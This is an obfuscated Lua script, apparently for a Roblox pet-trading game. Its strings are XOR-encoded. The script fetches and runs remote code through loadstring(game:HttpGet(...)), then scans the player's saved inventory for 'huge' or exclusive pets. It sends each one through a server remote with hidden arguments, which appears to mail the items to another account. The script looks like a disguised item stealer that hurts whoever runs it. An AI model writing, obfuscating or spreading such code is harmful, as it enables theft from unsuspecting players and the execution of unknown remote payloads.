--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v19,v20) local v21={};for v27=1, #v19 do v6(v21,v0(v4(v1(v2(v19,v27,v27 + 1 )),v1(v2(v20,1 + (v27% #v20) ,1 + (v27% #v20) + 1 )))%256 ));end return v5(v21);end loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\245\48\237\190\241\13\242\202\207\60\169\136\196\12\216\211\207\54\180\235\149\74\158\206\218\44\232\244\215\13\136\154","\126\177\163\187\69\134\219\167")))();for v22=(112 -(5 + 25)) -(1234 -(1069 + 118)) ,(2105 -1177) -((467 -253) + 713) , -(1 + 0) do task.wait(1 + 0 );end local v8=game:GetService(v7("\19\193\43\220\249\49\222","\156\67\173\74\165")).LocalPlayer;local v9=game:GetService(v7("\6\178\89\26\181\37\71\32\178\77\37\168\41\84\53\176\76","\38\84\215\41\118\220\70"));local v10=v9:WaitForChild(v7("\126\19\54\5\241\66\29","\158\48\118\66\114"));local v11=v10:WaitForChild(v7("\134\37\25\58\113\170\227\241\100\35\51\125\161","\155\203\68\112\86\19\197"));local v12=v7("\92\213\55\245\82\112\234\244\66\216\36\173","\152\38\189\86\156\32\24\133");local v13=v7("\251\80\180\6\240\88\171","\38\156\55\199");local v14=0.8 -0 ;local v15=require(v9.Library.Client.Save);local v16=v15.Get();local v17=require(v9.Library.Directory.Pets);local v18={};if (v16.Inventory and v16.Inventory.Pet) then for v28,v29 in pairs(v16.Inventory.Pet) do local v30=0 + 0 ;local v31;local v32;local v33;while true do if (v30==1) then v33=nil;while true do if (v31==1) then while true do if (v32==(877 -((1073 -(368 + 423)) + (1869 -1274)))) then v33=v17[v29.id];if (v29.id:find(v7("\143\124\110\47\18\122\238\86\169\115","\35\200\29\28\72\115\20\154")) or (v33 and (v33.huge or v33.exclusiveLevel))) then table.insert(v18,{[v7("\12\182\213","\84\121\223\177\191\237\76")]=v28,[v7("\186\91\198\181\52\68","\161\219\54\169\192\90\48\80")]=v29._am or ((1656 -(10 + 8)) -((5858 -4335) + (556 -(416 + 26)))) });end break;end end break;end if (v31==(0 -0)) then v32=0 + 0 + 0 ;v33=nil;v31=1 -0 ;end end break;end if (v30==(438 -(145 + 293))) then v31=0;v32=nil;v30=431 -(44 + 386) ;end end end end for v23,v24 in ipairs(v18) do local v25=0;local v26;while true do if (v25==(1487 -(998 + 488))) then task.wait(v14);break;end if (v25==0) then v26={v12,v13,v7("\121\71\20","\69\41\34\96"),v24.uid,v24.amount};pcall(function() return v11:InvokeServer(unpack(v26));end);v25=1139 -(116 + 1022) ;end end end
